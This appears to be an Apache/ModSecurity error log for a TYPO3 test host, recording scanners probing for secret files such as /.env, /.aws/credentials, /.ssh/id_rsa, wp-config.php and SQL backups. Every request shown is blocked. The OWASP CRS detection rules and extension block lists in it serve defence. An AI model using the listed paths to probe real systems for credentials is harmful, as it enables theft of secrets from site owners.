[Tue Mar 25 11:14:09.061017 2025] [:error] [pid 2012183] [client 213.232.87.232:41751] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-KB8eIESaL0ZyUOjboXYwAAAAk"]
[Tue Mar 25 11:14:09.816703 2025] [:error] [pid 2012182] [client 213.232.87.232:49609] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-KB8b1zBWAuMmCVJ0sL5QAAAAg"]
[Tue Mar 25 11:14:09.816913 2025] [:error] [pid 2012182] [client 213.232.87.232:49609] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-KB8b1zBWAuMmCVJ0sL5QAAAAg"]
[Tue Mar 25 11:14:09.817113 2025] [:error] [pid 2012182] [client 213.232.87.232:49609] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-KB8b1zBWAuMmCVJ0sL5QAAAAg"]
[Tue Mar 25 11:14:09.845001 2025] [authz_core:error] [pid 2005449] [client 213.232.87.232:50537] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Tue Mar 25 11:14:09.845317 2025] [:error] [pid 2005448] [client 213.232.87.232:24397] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-KB8WIHNELQdBjBDpzwsQAAAAI"]
[Tue Mar 25 11:14:09.845448 2025] [:error] [pid 2005448] [client 213.232.87.232:24397] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-KB8WIHNELQdBjBDpzwsQAAAAI"]
[Tue Mar 25 11:14:09.845626 2025] [:error] [pid 2005448] [client 213.232.87.232:24397] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-KB8WIHNELQdBjBDpzwsQAAAAI"]
[Tue Mar 25 11:14:09.845625 2025] [:error] [pid 2005450] [client 213.232.87.232:20141] [client 213.232.87.232] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z-KB8WUqH0Fbh9exXrHYRQAAAAQ"]
[Tue Mar 25 11:14:09.845781 2025] [:error] [pid 2005448] [client 213.232.87.232:24397] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z-KB8WIHNELQdBjBDpzwsQAAAAI"]
[Tue Mar 25 11:14:09.845819 2025] [:error] [pid 2005450] [client 213.232.87.232:20141] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z-KB8WUqH0Fbh9exXrHYRQAAAAQ"]
[Tue Mar 25 11:14:09.845966 2025] [:error] [pid 2005450] [client 213.232.87.232:20141] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z-KB8WUqH0Fbh9exXrHYRQAAAAQ"]
[Tue Mar 25 11:14:09.870049 2025] [:error] [pid 2015055] [client 213.232.87.232:57691] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z-KB8c9QDOnlO0Il2OmSGAAAAAo"]
[Tue Mar 25 11:14:09.870385 2025] [:error] [pid 2015055] [client 213.232.87.232:57691] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z-KB8c9QDOnlO0Il2OmSGAAAAAo"]
[Tue Mar 25 11:14:09.870590 2025] [:error] [pid 2015055] [client 213.232.87.232:57691] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z-KB8c9QDOnlO0Il2OmSGAAAAAo"]
[Tue Mar 25 11:14:09.872991 2025] [:error] [pid 2012181] [client 213.232.87.232:64405] [client 213.232.87.232] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-KB8Udxp-AaxdQ-cfgfWAAAAAc"]
[Tue Mar 25 11:14:09.873180 2025] [:error] [pid 2012181] [client 213.232.87.232:64405] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-KB8Udxp-AaxdQ-cfgfWAAAAAc"]
[Tue Mar 25 11:14:09.873365 2025] [:error] [pid 2012181] [client 213.232.87.232:64405] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-KB8Udxp-AaxdQ-cfgfWAAAAAc"]
[Tue Mar 25 11:14:09.913055 2025] [authz_core:error] [pid 2012183] [client 213.232.87.232:53593] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_secrets.yml
[Tue Mar 25 11:14:10.041725 2025] [authz_core:error] [pid 2005897] [client 213.232.87.232:38129] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Tue Mar 25 11:14:10.053953 2025] [authz_core:error] [pid 2005449] [client 213.232.87.232:37119] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database_backup.sql
[Tue Mar 25 11:14:10.054055 2025] [authz_core:error] [pid 2005448] [client 213.232.87.232:46689] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Tue Mar 25 11:14:10.055799 2025] [:error] [pid 2005447] [client 213.232.87.232:53335] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-KB8lZ2Q2QNAyAImxZPkwAAAAE"]
[Tue Mar 25 11:14:10.055987 2025] [:error] [pid 2005447] [client 213.232.87.232:53335] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-KB8lZ2Q2QNAyAImxZPkwAAAAE"]
[Tue Mar 25 11:14:10.056154 2025] [:error] [pid 2005447] [client 213.232.87.232:53335] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-KB8lZ2Q2QNAyAImxZPkwAAAAE"]
[Tue Mar 25 11:14:10.057600 2025] [:error] [pid 2012181] [client 213.232.87.232:41355] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z-KB8kdxp-AaxdQ-cfgfWQAAAAc"]
[Tue Mar 25 11:14:10.057860 2025] [:error] [pid 2012181] [client 213.232.87.232:41355] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z-KB8kdxp-AaxdQ-cfgfWQAAAAc"]
[Tue Mar 25 11:14:10.058004 2025] [:error] [pid 2012181] [client 213.232.87.232:41355] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z-KB8kdxp-AaxdQ-cfgfWQAAAAc"]
[Tue Mar 25 11:14:10.124664 2025] [authz_core:error] [pid 2015055] [client 213.232.87.232:62413] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Tue Mar 25 11:14:10.193147 2025] [authz_core:error] [pid 2005480] [client 213.232.87.232:48289] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Tue Mar 25 11:14:10.279858 2025] [:error] [pid 2005897] [client 213.232.87.232:63287] [client 213.232.87.232] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z-KB8rOOLCKK9zwYnfZf_gAAAAY"]
[Tue Mar 25 11:14:10.280033 2025] [:error] [pid 2005897] [client 213.232.87.232:63287] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z-KB8rOOLCKK9zwYnfZf_gAAAAY"]
[Tue Mar 25 11:14:10.280287 2025] [:error] [pid 2005897] [client 213.232.87.232:63287] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z-KB8rOOLCKK9zwYnfZf_gAAAAY"]
[Tue Mar 25 11:14:10.280494 2025] [:error] [pid 2005897] [client 213.232.87.232:63287] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z-KB8rOOLCKK9zwYnfZf_gAAAAY"]
[Tue Mar 25 11:14:10.412126 2025] [authz_core:error] [pid 2012182] [client 213.232.87.232:25729] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 11:14:10.417437 2025] [authz_core:error] [pid 2015057] [client 213.232.87.232:18749] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Tue Mar 25 20:14:34.009789 2025] [authz_core:error] [pid 2015055] [client 45.148.10.86:59030] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 20:15:34.901090 2025] [authz_core:error] [pid 2012183] [client 45.148.10.86:46398] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Mar 27 22:19:16.643972 2025] [:error] [pid 2077860] [client 45.148.10.172:35938] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-XA1Ig_oAAxUhycPdPaHQAAAA8"]
[Thu Mar 27 22:19:16.647285 2025] [:error] [pid 2077860] [client 45.148.10.172:35938] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-XA1Ig_oAAxUhycPdPaHQAAAA8"]
[Thu Mar 27 22:19:16.647467 2025] [:error] [pid 2077860] [client 45.148.10.172:35938] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-XA1Ig_oAAxUhycPdPaHQAAAA8"]
[Fri Mar 28 00:38:00.415776 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSLQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.416068 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSLQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.416255 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSLQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:00.692616 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "Z-XhWAOJJ7m4Hsc7bUYSMQAAAAE"], referer: https://www.google.com/
